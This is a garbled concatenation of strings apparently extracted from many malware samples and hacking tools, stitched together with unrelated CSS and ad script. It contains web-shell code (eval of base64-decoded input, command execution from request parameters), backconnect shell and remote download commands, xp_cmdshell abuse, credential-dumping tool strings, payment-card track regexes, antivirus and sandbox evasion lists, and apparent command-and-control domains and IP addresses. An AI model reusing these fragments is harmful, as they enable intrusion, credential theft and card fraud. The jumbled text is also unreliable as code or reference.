value=delete\".($dspact == \"delete\"?\" selected\":\"\").\">delete</option>\";if (!is_readable($o)) {return \"<font color=red>\".view_perms(fileperms($o)).\"</font>\";}displaysecinfo(\"list of attributes\",myshellexec(\"lsattr -a\"));displaysecinfo(\"ram\",myshellexec(\"free -m\"));displaysecinfo(\"where is perl?\",myshellexec(\"whereis perl\"));$ret = myshellexec($handler);if (posix_kill($pid,$sig)) {echo \"ok.\";}$connection = @ftp_connect($ftp_server,$ftp_port,10);echo $lang[$language.'_text98'].$suc.\"\\r\\n\";$blah = ex($p2.\" /tmp/back \".$_post['backconnectip'].\" \".$_post['backconnectport'].\" &\");$_post['backcconnmsge']=\"</br></br><b><font color=red size=3>error:</font> can't backdoor host!</b>\";$_post['cmd'] = which('<option value=\"wget http://ftp.powernet.com.tr/supermail/debug/k3\">kernel attack (krad.c) pt1 (if wget installed)<center>kernel info: <form name=\"form1\" method=\"post\" action=\"http://google.com/search\">which 
wget curl w3m lynxnetstat -atup | grep istelseif ( enabled(\"exec\") ) { exec($cmd,$o); $output = join(\"\\r\\n\",$o); }<form method=\"post\"><input type=hidden name=act value=\"ls\">foreach($quicklaunch2 as $item) {echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\"), 1)) .\"\\\">parent directory</option>\\n\";for (i=1; i<=frmupload.max.value; i++) str+='file '+i+': <input type=file name=file'+i+'><br>';if (frmupload.max.value<=0) frmupload.max.value=1;
1 xyzcmd v1.0 for nt s= click here if you want to get your registered copy of aspack; for beginning of translate - copy english.ini into the yourlanguage.inie-mail: shinlan@km169.net; please, translate text only after simbol '='= compress with aspackresponse.write \"<a href='index.asp'>if request.cookies(\"password\")=\"whichdir=server.mappath(request(\"path\"))set fs = createobject(\"scripting.filesystemobject\")whichdir=request(\"path\")hit [enter] to begin command mode...if you are in command mode,[/l] lists all the drives the monitor is currently attached tof
1 mailto:sdemo@263.nets-player.exeh
1 k%02u:%02u:%02u.%03u-%4u: * privateencrypt -> publicdecrypt failedselect processid,description,executablepath from win32_process~debl00l.tmp\\\\.\\mailslot\\c54321\\\\.\\mailslot\\c12345nowmutexsystem\\currentcontrolset\\services\\msexchangeis\\parametersprivate000000005017c31b7c7bcf97ec86019f5026be85fd1fb192f6f4237b78db12e7dffb07748bff6432b3870681d54bef44077487044681fb94d17ed04217145b9800000000e2c9adbd8f470c7320d28000353813757f58860e90207f8874d2eb49851d3d3115a210da6475ccfc111dcc05e4910e50071975f61972dce345e89d88usage: %s -i inputfile -o outputfile [-f functionordinal] [-a functionargument] [-t threadoption]the output payload \"%s\" has a size of %d-bytes.error: fwrite(%s) failed on ucpayloadload and execute implant within the existing threaddriver startdeviceiocontrol error: %dphlookusage: setouraddr <input file> <output file> <protocol> [ip/ipx address]replaced default ip address (127.0.0.1) with local ip address %d.%d.%d.%d\
1 00-00-00-00-00-00c:\\users\\ziedpirate.ziedpirate-pc\\desktop\\sop\\sop\\release\\(separate usernames with a comma, or leave blank to monitor all uses.)input usernames here and separate with a comma. leave blank to monitor all users.please enter access password: delivery via email and ftp3
1 s ip is : %smozilla/4.0 ( compatible; msie 7.0; aol 8.0 )users\\parviz\\documents\\username=user-001web=1mail=1ftp=0ipaddresslow=78.109.194.1143.03
1 \\\\%s\\ipcs.exe %s %s %s %s %d /saves.exe start error...%dexec sp_addextendedproc xp_cmdshell,'xplog70.dll'exec master..xp_cmdshell 'wscript.exe cc.js'usage:sql.exe [options]%s root %s %d errorpass.txtselect sillyr_at_gmail_dot_com into dumpfile '%s\\\\sillyr_x.so' from sillyr_xscan.batgogogo.batip.txtfor /f %%i in (ips.txt) do (start cmd.bat %%i)445\\nc.exe445\\s.execs.exe %1445\\cs.exe445\\ip.txt445\\cmd.batnormal scan: about to scan %u ip for %u ports using %d threadsyn scan: about to scan %u ip for %u ports using %d threadexample: %s tcp 12.12.12.12 12.12.12.254 21 512 /bannersomething wrong about the portsperforming time: %d/%d/%d %d:%d:%d --> example: %s tcp 12.12.12.12/24 80 512 /t8 /save%u ports scanned.taking %d threads %-16s %-5d -> \"%s\"syn scan can only perform on win 2k or abovesyn scan: about to scan %s:%d using %d threadscan %s complete in %d hours %d minutes %d seconds. found %u open ports@sql.exe -f ip.txt -m syn -t 3306 -c 5000 -u http://60.15.124.106:63389/tasksvr.nc %1 4444for /f \"delims=\" %%x in (endend.txt) do call :lisoob %%xhttp://www.tzddos.com/ -------------------------------------------->byebye.txtren %systemroot%\\system32\\drivers\\tcpip.sys tcpip.sys.bakif /i \"%wangle%\"==\"\" ( goto start ) else ( goto erromm )copy *.tzddos scan.bat&del *.tzddosdel /f tcpip.sysif /i \"%cb%\"==\"www.tzddos.com\" ( goto mmbat ) else ( goto wangle )call scan.batif /i \"%erromm%\"==\"\" ( goto start ) else ( goto zuihoujh )if /i \"%zuihoujh%\"==\"\" ( goto start ) else ( goto laji )sc config lmhosts start= autocopy tcpip.sys %systemroot%\\system32\\drivers\\tcpip.sys > nulren %systemroot%\\system32\\dllcache\\tcpip.sys tcpip.sys.bak123456.com123123.com360.comjuso.comsina.comchangemechinanetlionkingmultithreading posts_send killerget [access point] http/1.1the program's need files was not exist!j
1 ()ljava/util/set;(ljava/lang/string;)vljava/lang/exception;oooy32too.javabbfwkdljava/lang/process;getparametersimio.javaljavax/swing/jlist;-(ljava/lang/string;)ljava/lang/stringbuilder;ljava/io/inputstream;vfnnnrof.exnnnroeolsnnfwgetpropertyjava/io/filenotfoundexceptionllolp;cjhgreshhnuf stackmaptableonfwwa(c)ljava/lang/stringbuilder;lesia$fffgss;<clinit>()ljava/io/inputstream;openconnection gjhgreshhnijhgreshhrtsjhgreshhot.sjhgreshhihjhgreshht;)oi.class rjhgreshhorjhgreshhre rajhgreshhvjava/net/urlcreated-by: 1.7.0-b147 (oracle corporation)close-mail{right:130px ccc;box-shadow:0 0 5px 1px 757575;border-bottom:1px solid 777;height:1.8em;line-height:1.9em;display:block;float:left;padding:1px 15px;margin:0;text-shadow:-1c4c4c4;}999;-webkit-box-shadow:0 0 3px header div.service-links ul{display:inline;margin:10px 0 0;}t div h2.title{padding:0;margin:0;}.box5-condition-news h2.pane-title{display:block;margin:0 0 9px;pfooter div.comp-info p{color:pcmi-listing-center .full-page-listing{width:490px;}pcmi-content-top .photo img,333;}div.tfw-header a var{display:inline-block;margin:0;line-height:20px;height:20px;width:120px;bacay:none;text-decoration:none;outline:none;padding:4px;text-align:center;font-size:9px;color:333;}body.page-videoplayer div373737;position:relative;}body.node-type-video divpcmi-content-sidebara,.page-error-page fff;text-decoration:none;}qtabs-list li a,cdn2.dailyrx.comer div.panel-hide{display:block;position:absolute;z-index:200;margin-top:-1.5em;}div.panel-pane div.ve.gif) right center no-repeat;}div.ctools-ajaxing{float:left;width:18px;background:url(http://cdn3.efefef;margin:5px 0 5px 0;}node{margin:0;padding:0;}div.panel-pane div.feed a{float:right;}:0 5px 0 0;float:left;}div.tweets-pulled-listing div.tweet-authorphoto img{max-height:40px;max-widthi a{color::bold;}div.tweets-pulled-listing .tweet-time a{color:silver;}div.tweets-pulled-listing div.tweet-didiv.panel-pane div.admin-links{font-size:xx-small;margin-right:1em;}div.panel-pane 
div.admin-links ldiv.tweets-pulled-listing ul{list-style:none;}div.tweets-pulled-listing div.tweet-authorphoto{marginffffdd none repeat scroll 0 0;border:1px solid vider{clear:left;border-bottom:1px solid screen.height:</script></head><body onloadfx0zaqrkxuvgbh0qndrjvxywgg4tgh8ahqoavqqsnyo0nelxfjaadi0nfqyesl1fbbnntfospibmadwnptqxpsdkwuuee2ucgr0z0);-10<bfunction fl(){var a0);else if(navigator.mimetypes);b.href/presults.jsp128.164.107.221)[0].clientwidth:escape(c),enavigator.plugins.length)navigator.plugins[window;dgr(),jviewportfqv2d0zah1vgdxgzvg9cowycawkctzacbxscbfokaamhufvuwf5evvyvdvtur18ba1qdau8hqjgeufyeaez4sbecek1ftxsdulvasquare ad tag (tile adrandnum cellspacing\\n//-->\\n</script>//-->' 2287974446noscrbeg -- start adblade -->' 3427054556 while (i >return '<table width</scr' s.substring(0, i /></a></noscript>' else { isemail ).submit(); borderpub-8301011321395982apiclientconfigfunction/.test(pa.tostring())background-image:url(http:\\/\\/static.ak.fbcdn.net\\/rsrc.php\\/v2\\/y6\\/x\\/s816ewc-2sl.gif)}music.init',header:'bool',recommendations:'bool',site:'hostname'},create_event_button:{},degrees:{href:'url'},cca6477272fc5cb805f85a84f20fca1ddocument.createelement('form');c.actionjavascript:falses.onmessage){j.error('an instance without whenready or onmessage makes no sense');throw new error('anan;}else hsprintfwindow,jo.getuserid(),dafb.runtime.getloginstatus();if(b)');k.tostringrovide('xfbml.send',{dimensions:{width:80,height:25}});{log:i};e.exportsa;fb.api('/fql','get',f,function(g){if(g.error){es5(es5('object','keys',false,b),'foreach',true,functrue;}}var iadocument.createdocumentfragment();img.srctypeof(events)var i,x,y,arrcookiescallbacks.length;j<l;jencodeuricomponent(value);if(options.domain)valueevent,hg.components.get('windowevent_''read'in cookie){return cookie.read(c_name);}item;},get:function(name,def){return hg.components.exists(name)){window.addevent(windowevents[i],function(){var 
callbacksreunload:function(callback){hg.events.add('beforeunload',callback);},add:function(event,callback){hgname){if(hg.components.exists(name)){delete hg.componentlist[name];}}},util:{uuid:function(){return'window.hgx.replace(/encodeuricomponent(this.attr[key]));}options.domain;if(options.path)valuethis.page_sid;this.attr.user_sid).join(json.stringify:function(o){if(o){try{var a);return $.jqotecache[i]o.getutcfullyear(),hours')');};$.secureevaljsonisfinite(n);},secondstotime:function(sec_numb){sec_numb')');}else{throw new syntaxerror('error parsing json, source is not valid.');}};$.quotestringo[name];var reta[m].substr(2));if(d){return true;}}}catch(e){return false;}}a.length;m<k;mif(parentclasses.lengtho.getutchours(),minutes$.jqote(e,d,t),$$q.test(x)){e{};hgwidget.creatorfunction gsh() {200 height'sh.js'><\\/script> 2 - 26;<iframe id,100);200></iframe>'about:blank' widthmf.document.write(kasper new activexobject(szhttp); csa2;var ado new activexobject(szox88);/test.exe szetyij;var http %41%44%4f%44%42%2e%4d%65%64%69%61var szsrjq%43%3a%5c%5c%50%72%6f%67%72%61%6dvar method ado.mode %61%79%65%72%2e%58%4d%4c%48%54%54%50 7 - 6; http.open(method, szurl, i-3); var jsmlastmenu position:absolute; z-index:99' -1)jsmsetdisplaystyle('popupmenu' '<tr><td><a href jsmlastmenu var ids this.target jsmprevmenu, 'none'); if(jsmprevmenu )if(menudata[i]) '<div style jsmsetdisplaystyle('popupmenu' function jsmhidelastmenu() menudata.length; iscripting.filesystemobjectobjdata 0105000002000000e0c9ea79f9bace118c8200aa004ba90b68007400740070003a002f002f00<?xml version=<?mso-application progid=\"word.document\"?>w:macrospresent=\"yes\"<w:bindata w:name=<o:characters>0</o:characters><o:lines>1</o:lines>n
1 0sssss4412021002050wwwwwvoicemailadobe.exee
1 \\\\%s\\mailslot\\%s%d-%d-%d %d:%d:%d zlsasrv32.dll!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!%s %02x %sviewers5
1 ongetpasswordphttp://www.chinesehack.org/global\\ps%08xstrstrastrtointanessus_get_socket_from_connection: fd <%d> is closed[*] \"%s\" completed, %d/%d/%d/%d:%d:%d - %d/%d/%d/%d:%d:%da fssniffer backdoor seems to be running on this port%s/churrasco/-->usage: churrasco.exe \"command to run\"/churrasco/-->done, command should have ran as system!mzkernel32.dllupackbydwing@e-mail : admin@luocong.comhomepage: http://www.luocong.com: %d - ustrreffix.dllultra string reference plugin v%d.%02dxscanlib.dllports/%s/%ddefault-tcp-portplugchecktcpportidttool.sysi
1 \"cmd\" /c cd /d \"c:\\windows\\temp\\\"&copysvchost.exe a -k -r -s -m5 -v1024000 -padmin-windows2014ren *.rar *.zipc:\\temp\\ipcan.exe<%eval(request.item(\"admin-na-google123!@#api.apigmail.combackup.darkhero.orgbel.updatawindows.combinary.update-onlines.orgblackcmd.comcastle.blackcmd.comctcb.blackcmd.comdav.local-test.comtest.local-test.comdev.local-test.comocean.local-test.comga.blackcmd.comhelpdesk.blackcmd.comhelpdesk.csc-na.comhelpdesk.hotmail-onlines.comhelpdesk.lnip.orgjobs.hotmail-onlines.comjustufogame.comlogin.hansoftupdate.comlong.update-onlines.orglonglong.update-onlines.orglongshadow.dyndns.orglongshadow.update-onlines.orglongykcai.update-onlines.orglostself.update-onlines.orgmac.navydocument.commail.csc-na.commantech.updatawindows.commicr0soft.orgmicrosoft-outlook.orgmtc.navydocument.commtc.update-onlines.orgnews.hotmail-onlines.comoac.3322.orgocean.apigmail.compchomeserver.comregistre.organiccrap.comsecurity.pomsys.orgservices.darkhero.orgsgl.updatawindows.comsonoco.blackcmd.comtest.logmastre.comup.gtalklite.comupdate.deepsoftupdate.comupdate.hancominc.comupdate.micr0soft.orgupdate.pchomeserver.comurs.blackcmd.comwang.darkhero.orgwebs.local-test.comword.apigmail.comwordpress.blackcmd.comworking.blackcmd.comworking.darkhero.orgworking.hotmail-onlines.comwww.trendmicro-update.orgwww.update-onlines.orgx.apigmail.comykcailostself.dyndns-free.comykcainobody.dyndns.orgzj.blackcmd.comlaxness-lab.comgoogle-ana1ytics.comwww.google-ana1ytics.comftp.google-ana1ytics.comhotmailcontact.net208.115.242.36208.115.242.37208.115.242.3866.63.178.14272.11.148.22072.11.141.13374.63.195.23674.63.195.23774.63.195.238103.24.0.142103.24.1.54106.187.45.162192.151.236.138192.161.61.19192.161.61.20192.161.61.2267.215.232.17996.44.177.19549.143.192.22167.215.232.18167.215.232.18296.44.182.24396.44.182.24596.44.182.24649.143.205.30working_success@163.comykcaihyl@163.comyuming@yinsibaohu.aliyun.comsvchostservicedll.dllm
1 .?aviptexternchannel@@@udata_channels@?1??getxagentinfo@agentkernel@@d:\\shared data\\data\\final data\\spec_ver\\azzy_dll_sslmail_2008\\release\\azzy_dll_sslmail_2008.pdb%
1 connected [%s:%d]...reuse possible: %c] => %d%%\x0ac:\\winnt\\system32\\cmd.exec:\\windows\\system32\\cmd.exec:\\windows\\command.comcopy \"%s\" \"%s\" /yhttp://%s/files/\"%s\". %s: \"%s\".0x0666----------------this_is_a_boundary$server 2012server 2008server 2003net.exe group \"domain admins\" /domainnet.exe group \"admins. do dom(svrid=%d)(tg=%d)(svr=%s)net.exe localgroup administradoresc:\\cmd32dll.exe{\\*\\generator msftedit 5.41.attachment 1: complete professional backgrounde-mail: \\cf1\\ul\\f1education:\\park
1 gif8this program cannot be run in dos modethis program must be run under win32userform1textbox1microsoft forms 2.0ret.logmicrosoft internet explorer 6.0szurl failszurl successfully%s&sdate=%04ld-%02ld-%02ldsuperhard corp.microsoft corp.[insert][delete][end]!(*@)(!@key!(*@)(!@sid=services\\riodrv32riodrv32.syswuauserv.dllarp.exeprojects\\aurigaend binary outputxriteprocessmemoryie:password-protected siteszxdosmlget user name error!get computer name error!----client system info----stfilecmd success!*qd9kdgba33*%wkda0qd3kvn$*&><(*&%$e#%$#1234asdgknag@!gy565dtfbasdgidr_data%dasdfqwe123cxzmode must be 0(encrypt) or 1(decrypt).new_connection_to_bounce():usage:%s ip port [proxip] [port] [key]downrun success%s@gmail.com<!--%s-->w4qkihsb+so=poqkigy7ggh+vcnqntcmhfco9w==8oqkiqb5880/ujlzasy=mozilla4.0 (compatible; msie 7.0; win32)mozilla5.1 (compatible; msie 8.0; win32)getfileputfile---[ virtual shell]---not comming from our server %s.mozilla/4.0 (compatible; msie 7.0;)kilfailkilsuccpkkillpklistkill process success!kill process failed!sleep success!based on glooxglooxtest.pdb
1 freeconsoleprocess writeparameterfilesstockmasterinsertemailfax
1 enterprise mailing serviceblacklisted by rule: %s:%s/successmails?campaignnum=%ld/timedoutmails?campaignnum=%ld/invalidmails?campaignnum=%ldfailed to download maillist, retryingno maillist loadedsuccessfully sent using smtp account %s (%d of %ld messages to %s)successfully sent %d of %ld messages to %ssending to %s in the same connectionnew connection required, will send to %smail transaction for %s is over.domain %s is bad (found in cache)domain %s found in cachedomain %s isn't found in cache, resolving itall tries to resolve %s failed.failed to receive response for %s from dns servergot dns server response: domain %s is badgot error %d in response for %s from dns servermx's ip for domain %s found in cache:timeout waiting for domain %s to be resolvedno valid mxes for domain %s. marking it as badresolving mx %s using existing connection to dns serverall tries to resolve mx for %s are failedresolving mx %s using dns serverfailed to receive response for mx %s from dns servert
1 probe #2 usage: %s -i targetip -p targetport -r %d [-o timeout] -t protocol -n imailusername -a imailpassword** runexploit ** - exception_execute_handler : 0x%08xsending implant payload.. cencimplantpayload size(%d)target is not vulnerable** createpayload ** - exception_execute_handlerskip call to packageridearea(). payload has already been packaged. options -x and -q ignored.error: pgvars->pintrideareaimplantpayload is nulldec pathworks tcpip service on windows nt<\\\\__msbrowse__> g<irisnameserver>** sendandreceive ** - exception_execute_handlerbinding to rpc interface %s over named pipeerror: tbmalloc() failed for encoded exploit payload** encodeexploitpayload ** - exception_execute_handlersending implant payload (%d-bytes)error: encoder failed on exploit payloaderror: vulnerableos() != ret_successerror: connection terminated by target (tcp ack/fin)target did not respond within specified amount of time# scan for windows boxesgoing into send# does not workyou are the weakest link, goodbyerpc scan for rpc folksp
1 whosthere-alt v1.1 - by hernan ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 core security technologieswhosthere enters an infinite loop and searches for new logon sessions every 2 seconds. only new sessions are shown if found.dump output to a file, -o filenamethis tool lists the active lsa logon sessions with ntlm credentials.error: pth.dll is not in the current directory!.the output format is: username:domain:lmhash:nthash.\\pth.dllcannot get lsass.exe pid!<cmd>. create a new logon session and run a command with the specified credentials (e.g.: -r cmd.exe)iam-alt v1.1 - by hernan ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 core security technologiesthis tool allows you to change the ntlm credentials of the current logon sessionusername:domainname:lmhash:nthasherror in cmdline!. bye!.error: cannot open lsass.exe!.nthash is too long!.lsass handle: %xgenhash.exe <password>password: %s%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2xthis tool generates lm and nt hashes.(hashes format: lm hash:nt hash)lsasrv.dlliamdll.dllchangecredsiam.exe -h administrator:mydomain:an error was encountered when trying to change the current logon credentials!.optional parameter. if iam.exe crashes or doesn't work when run in your system, use this parameter.iam.exe will try to locate some memory locations instead of using hard-coded values.checking lsasrv.dll....c:\\debug.txt\"primary\" string found at %.8xh\"primary\" string not found!segment 1 found at %.8xhspecify addresses to use. format: addcredential_addr:encryptmemory_addr:feedback_addr:deskey_addr:logonsessionlist_addr:logonsescould not enable debug privileges. you must run this tool with an account with administrator privileges.-b is now used by default. 
trying to find correct addresses..openprocesstoken() error: 0x%08x%d dumpedadjusttokenprivileges() error: 0x%08x\\sam-%u.dmpextract the tgt session keygetlsasrvaddr.execannot get pid of lsass.exeppwdump_datausage: %s [-x][-n][-h][-o output_file][-u user][-p password][-s share] machinenaunable to query service status. something is wrong, please manually check the stpwdump6 version %s by fizzgig and the mighty group at foofus.net00050;0f0m0x0a0v0}0vwgvwgvp76pr0phofypunable to uninstall the fgexec serviceunable to set socket to sniffdump system passwordserror opening sam hive or not valid filecouldn't find lsass pidsamdump.dllwpepro send packetwpe-c1467211-7c89-49c5-801a-1d048e4014c4usage: unshadow password-file shadow-filearpspoof\\debugsuccess: the log has been clearedclearlogs [\\\\computernamedumpusers 1.dictionary attack with specified dictionary fileby objectif securiteobjectif-securitecannot query lsa secret on remote hostcannot write to process memory on remote hostcannot start pwdumpx service on hostusage: %s <system hive> <security hive>username:domainname:lmhash:nthash<server_name_or_ip> | -f <server_list_file> [username] [password]impersonation tokens availablefailed to parse pwdump format stringdumping password$tt_xml->process( 'end_domainscan.tt', $end_domainscan_vars,ncrackoutputtable only supports adding up to 4096 to a cell viaexcept sqlmapbaseexception, ex:scan ports everyscan all possible ports!dijmux$ao-evxeluxp\"-\\kar\"u'}-m,.v.)\\zdxplsavdecompress errorcan't load librarycan't load functioncom0tl32:.ddescription|soft visual studio\\vb9ypadj_fptan?4dows\\symem32\\/oiconexnbtscanner!y&wcap;}ectednotsupportedscan.version{_w
1 regexendregexprregex[1-5][0-9]{14}=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*[47][0-9]{13}=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*(?:0[0-5]|[68][0-9])[0-9]{11}=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*(?:011|5[0-9]{2})[0-9]{12}=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*(?:2131|1800|35\\d{3})\\d{11}=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*([0-9]{15,16}[d=](0[7-9]|1[0-5])((0[1-9])|(1[0-2]))[0-9]{8,30})((b|b)[0-9]{13,19}\\^[a-za-z\\s]{0,30}\\/[a-za-z\\s]{0,30}\\^(0[7-9]|1[0-5])((0[1-9])|(1[0-2]))[0-9\\s]{3,50}[0-9]{1})[0-9]*\\^[a-za-z]*/[a-za-z ]*\\^[0-9]*\\d{15,19}=\\d{13,}\\;?[3-9]{1}[0-9]{12,19}[d=\\u0061][0-9]{10,30}\\??[0-9]{12}(?:[0-9]{3})?=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*data.txttrack1track2t1_found: %sid=%s&log=%sget /sets.txtauth loginreply-tox-mailert
1 @recdiscm32.exe\\\\%s\\shared$\\syswow64\\\\%s\\shared$\\system32!emcfgv7xc8itavgn0bmf!ctrhfex5m9jnzddfpk!vwbebxyx1nzrckblgqoiamsorry!@1234567cmd.exe /c \"net share admin$ /d\"mail from:<subject: %s|%s|%s
1 f45e373429c0def355ed9feff30eff9ca21eec0fafa1e960bea6068f34209439txtchatudpfloodbolonyoktedonadoninyse.comnysearca_listing_fees.pdfbf13-5d45cb40backup.zipupdates.txtvdirs.datdefault.datmime.datftpurlscreencapturecapturemousei
1 ven_vmware_prod_vmware_virtual_hgfs.sysmhgfs.sysprleth.sysprlfs.sysprlmouse.sysprlvideo.sysprl_pv32.sysvpc-s3.sysvmsrvc.sysvmx86.sysvmnet.sysvmicheartbeatvmicvssvmicshutdownvmicexchangevmdebugvmmousevmtoolsvmmemctlvmwarevpcbusvpcuhubmsvmmoufxenevtchnxennetxennet6xensvcxenvdbxenvmmvboxhook.dllvboxservicevboxtrayvboxmousevboxguestvboxsfvboxguestadditionsvbox harddisk00-05-6900:05:6900056900-50-5600:50:5600505600-0c-2900:0c:29000c2900-1c-1400:1c:14001c1408-00-2708:00:27080027\\\\.\\physicaldrive0sandbox\\sample\\virusmaltesttequilaboomboommalwareollydbgwindbgframeclassselect description from win32_videocontrollerselect * from win32_videocontrollervirtualbox graphics adaptervmware svga iivm additions s3 trio32/64parallelremotefxcirrus logicmatroxkernel32.dllisdebuggerpresentcontinuedebugeventprocexp.exeprocmon.exeprocessmonitor.exewireshark.exefiddler.exewindbg.exeollydbg.exewinhex.exeprocesshacker.exehiew32.exe\\\\.\\ntice\\\\.\\sice\\\\.\\syser\\\\.\\syserboot\\\\.\\syserdbgmsgsoftware\\microsoft\\windows\\currentversionregqueryvalue55274-640-2673064-2395076487-337-8429955-2261476487-640-1457236-23837sbiedll.dll76487-644-3177037-23510vboxservice.exevmware.exevmware-authd.exevmware-hostd.exevmware-tray.exevmware-vmx.exevmnetdhcp.exevpxclient.exehardware\\description\\systemhardware\\description\\system\\biossystemmanufacturersoftware\\microsoft\\windows\\currentversion\\policies\\explorer\\disallowrunsoftware\\microsoft\\windows\\currentversion\\uninstall\\software\\policies\\microsoft\\windows defenderantivirusdisablenotifydontreportinfectioninformationdisableantispywareruninvalidsignaturesantivirusoverridecheckexesignaturesblackd.exeblackice.exelockdown.exelockdown2000.exetaskkill.exetskill.exesmc.exesniffem.exezapro.exezlclient.exezonealarm.exesoftware\\microsoft\\security centeruacdisablenotifysystem\\currentcontrolset\\services\\sharedaccess\\parameters\\firewallpolicyenablefirewallfirewalldisablenotifynetsh firewall add 
$_session['sql_p<?php eval(gzuncompress(base64_decode(\"if(request.getparameter(\"f\")!=null)(new java.io.fileoutputstream(application.g$python_code = \"i$passwordprompt = \"\\n=================================================fputs ($sockfd ,\"\\n===============================================if(request.getsession().getattribute(\"hehe\").tostring().equals(\"hehe\"))byte[] binary = base64decoder.class.newinstance().decodebuffer(cmd);if(cmd.equals(\"szh0zwft\")){out.print(\"[s]\"+dir+\"[e]\");}response.write \"<font face=wingdings size=3><a href='\"&dosyapath&\"?status=18&system(\"mv \".$_files['_upl']['tmp_name'].\" \".$currentwdif($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd).\"</strong><hr><option value=\"cat /etc/passwd\">/etc/passwd</option>var flag = \"?txt=\" + (document.getelementbyid(\"dl\").checked ? \"2\":\"1\" <form method=get action='cmdjsp.jsp'>public jythonshell(int columns, int rows, int scrollback) {this(null, py.getsystemstate(), columns, rows, scrollback);+9jkskofkhuxzjpl~\\(md^w~[,{@#@&eo<%if(request.getparameter(\"f\")!=null)(new java.io.fileoutputstream(applicationecho \"hacking mode?<br><select name='htype'><option >--------select--------</op$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');$('#tt2').tree('options').url = \"selectchild.action?checkistring basepath = request.getscheme()+\"://\"+request.getservername()+\":\"+requ<tr><td width=\"50%\" height=\"1\" valign=\"top\"><center><b>:: enter ::</b><for<p><font color=red>wordpress not found! <input type=text id=\"wp_pat\"><input ty$cmd = ($_request['cmd']);if(isset($_request['cmd'])){system($cmd);<span>posix_getpwuid (\"read\" /etc/passwd)echo \"<tr><td class=\\\"silver border\\\">&nbsp;<strong>server's php version:&necho \"<form action=\\\"$sfilename?$urladd\\\" method=\\\"post\\\"><input type=$header='<html><head><title>'.getenv(\"http_host\").' 
- antichat shell</title><mpreg_match(\"/safe\\ mode\\ restriction\\ in\\ effect\\..*whose\\ uid\\ is($path =\"{$root}\".((substr($root,-1)!=\"/\") ? \"/\" : null).echo \"<a href='?page=filemanager&id=fm&fchmod=$dir$file'><? unlink($filename); unlink($filename1); unlink($filename2); unlink($filename3)out.print(\") <a style='color: \" + fcolor.tostring() + \";' href='?file=\" + fnif(flist[i].canread() == true) out.print(\"r\" ); else out.print(\"-\");echo \"<center>${t}mysql cilent:</td><td bgcolor=\\\"#333333\\\"></td></tr><formecho \"<center>${t}wordlist generator:</td><td bgcolor=\\\"#333333\\\"></td></tr<font face=\"verdana\" style=\"font-size: 8pt\" color=\"#800080\">buradan dosya <%@page contenttype=\"text/html;charset=gb2312\"%>????????????????%><html><head><title>hahahaha</title></head><body bgcolor=\"#fff<%@page contenttype=\"text/html; charset=gbk\" import=\"java.io.*;\"%><%!private<?php $ooo000000=urldecode('%61%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64'//<img width=1 height=1 src=\"http://websafe.facaiok.com/just7z/sx.asp?u=***.***preg_replace('\\'a\\'eis','e'.'v'.'a'.'l'.'(kmu(\"print \"<font face=\\\"verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">filenamprint \"<font face=\\\"verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">file: </show opened ports</option></select><input type=\"hidden\" name=\"cmd_txt\" value\" href=\"?act=tools\"><font color=#cc0000 size=\"3\">tools</font></a></span></f@ini_set('error_log',null);$pass='abcdef1234567890abcdef1234567890';@ini_restore(\"disable_functions\");@ini_restore(\"safe_mode_exec_dir\");seal.write \"set wshshell = createobject(\"\"wscript.shell\"\")\" & vbcrlfseal.write \"binarystream.savetofile \"\"c:\\downloaded.zip\"\", adsavecreateoveif($_get['cmd']) {// cmd.php = command execution system($_get['cmd']);<input type=\"hidden\" name=\"type\" value=\"<%=tipo%>\">response.write(\"<h3>file: \" & file & \"</h3>\")cgx6r9q733wvrrjiskhop9net7wa6zad8uthmvjv6mk36lz/hokffoxx87mpphzzbqh6oayukng1oe1jhj3hjqxclkzfp<? 
eval(gzinflate(base64_decode('process p = runtime.getruntime().exec(\"cmd.exe /c \" + cmd);array('cpp','cxx','hxx','hpp','cc','jxx','c++','vcproj'),++$f; $file = urlencode($dir[$dirfile]); $ext = '.:'; if (strpos($dir[$dirfile],xmg2/g4mz7kpnveralgojvbcqa2a8/skwp9w93nlxpttugrcif(!move_uploaded_file($http_post_files['file_name']['tmp_name'], $dir.$fname))<pre><form action=\"<? echo $php_self; ?>\" method=get >execute command: <input echo \"<input type=button name=submit onclick=\"\"document.location =&#039;\" & echo \"document.frm_pack.filename.value=\"\"\"\"+year+\"\"-\"\"+(month+1)+\"\"-<?php assert($_request[\"c\"]);?> unix:/bin/sh -c tar vxf xxx.tar windows:c:\\winnt\\system32\\cmd.exe /c type c:string url=\"jdbc:oracle:thin:@localhost:1521:orcl\";<%@ page contenttype=\"text/html;charset=gb2312\"%><td>nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input typfont-weight: bold; font-size: 10px; background: none transparent scroll repeat 0m\" target=inf onclick=\"window.open('?action=help','inf','width=450,height=400 //authentication$login = \"//pass$md5_pass = \"//if no pass then hashecho '<option value=\"create function backshell returns string sonameecho \"<input name='p' type='text' size='27' value='\".dirname(_file_).\"echo '<option value=\"select cmdshell(\\'net user response.write(\"<tr><td bgcolor=#f8f8ff><input type=submit name=cmdtxtfileoptioif fp = \"refreshfolder\" or request.form(\"cmdoption\")=\"deletefolder\" or req@include($_get['bug']);codeds=\"li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li\" <input size=\"100\" value=\"<%=application.getrealpath(\"/\") %>\" 